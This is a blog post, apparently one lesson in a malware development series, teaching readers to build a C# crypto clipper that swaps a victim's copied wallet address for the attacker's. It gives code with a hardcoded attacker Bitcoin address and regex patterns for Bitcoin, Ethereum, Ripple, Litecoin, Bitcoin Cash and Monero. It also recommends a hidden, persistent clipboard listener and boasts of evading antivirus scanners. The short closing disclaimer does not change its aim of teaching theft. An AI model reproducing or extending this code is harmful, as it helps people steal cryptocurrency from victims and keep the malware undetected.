Lesson 12: Crypto Clipper — Stealing Cryptocurrency Like a Pro

👾 Malware Development Series by XIT (C#)

XIT
4 min readApr 9, 2023

Follow XIT on medium & UglyCompany on Telegram for more..

Below is the Topics List for Lesson 12:

12. Crypto Clipper:
⇢ BTC
⇢ ETH
⇢ Ripple
⇢ Litecoin
⇢ BTC Cash
⇢ Monero
more…

In this lesson, we’ll demonstrate how to add functionality that can steal cryptocurrency by replacing the user’s wallet address with attackers address. In lesson 9 we learnt about stealing cryptocurrency from offline wallets present on the target machine. We will cover the most popular cryptocurrencies, such as BTC, ETH, Ripple, Litecoin, BTC Cash, and Monero in this lesson. You will learn how to develop a function in your malware that can replace the recipient wallet address in clipboard memory with your own. This simple yet effective technique can help you steal cryptocurrency without detection. Join us to learn how to become a pro at stealing cryptocurrency with Crypto Clipper!

Below is the basic understanding of the working. It checks the user’s address using a regular expression pattern, and if the address matches, it replaces the user’s address with the attacker’s address.

// clipper
// attacker address
string attackerAddress = "1FfmbHfnpaZjKFvyi1okTjJJusN455paPH";

// user address
string userAddress = "bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh";

// regex pattern to match user's address
string regexPattern = @"^bc[13][a-zA-HJ-NP-Z0-9]{25,39}$";

// Check address matches regex pattern
if (Regex.IsMatch(userAddress, regexPattern))
{
// Replace user address with attacker address
userAddress = attackerAddress;

// Display message to confirm replacement
Console.WriteLine("User's address has been replaced with attacker's address.");
}
else
{
// Display message if user's address does not match regex pattern
Console.WriteLine("User's address is invalid and cannot be replaced.");
}

You can add support to other wallets by just replacing the regex pattern and address to be replaced. In the above example I’ve added one predefined wallet address, but you have to add a listener which can listen to clipboard of the user and whenever any address which matches the given regex is found then it is been replaced.

Below are regex patterns for other crypto addresses:

BTC

string regexPattern = @"^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$";

This pattern matches BTC addresses that start with “bc1” or “1” or “3”, followed by 25 to 39 alphanumeric characters, excluding “0”, “O”, “I”, and “l” to avoid ambiguity.

ETH

string regexPattern = @"^0x[a-fA-F0-9]{40}$";

This pattern matches ETH addresses that start with “0x”, followed by 40 hexadecimal characters.

Ripple

string regexPattern = @"^r[0-9a-zA-Z]{24,34}$";

This pattern matches Ripple addresses that start with “r”, followed by 24 to 34 alphanumeric characters.

Litecoin

string regexPattern = @"^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$";

This pattern matches Litecoin addresses that start with “L”, “M”, “3”, followed by 26 to 33 alphanumeric characters, excluding “0”, “O”, “I”, and “l” to avoid ambiguity.

BTC Cash

string regexPattern = @"^([qpzry9x8gf2tvdw0s3jn54khce6mua7l]{42}|(bitcoincash:)?(q|p)[a-z0-9]{41})$";

This pattern matches BTC Cash addresses that start with “q” or “p”, followed by 41 alphanumeric characters, or addresses encoded in base58 with the prefix characters “bitcoincash:”, followed by 42 base58 characters.

Monero

string regexPattern = @"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$";

This pattern matches Monero addresses that start with “4”, followed by a character in the range of “0” to “9” or “A” to “B”, followed by 93 alphanumeric characters, excluding “0”, “O”, “I”, and “l” to avoid ambiguity.

Finally, I compiled all the topics of lesson 12 & also added a persist listener so it can listed to the clipboard values forever in background and also the process is hidden, later it was detected by 0 out of 26 antivirus scans.

Remember: Don’t share your unencrypted assemblies or malware source to random antivirus scanners, use the only those which are listed on the article given below to keep your malware undetected forever:

https://x-it.medium.com/stop-killing-your-malware-learn-to-perform-safe-scans-for-self-developed-malwares-fe95480a65ed

Conclusion

“Clipper” is a type of malicious program used by hackers to steal cryptocurrency from victims by replacing their wallet addresses with the attacker’s address. It can be distributed through phishing emails, malicious websites, or even legitimate app stores. Victims may suffer significant financial losses, and the use of clipper malware is illegal and unethical. Good cybersecurity practices can help protect against clipper malware and other types of cyberattacks.

A supporter is worth a thousand followers. 😊

--

--

XIT
XIT

Written by XIT

SHHH! The voice of none is stronger than the voice of one.

Responses (1)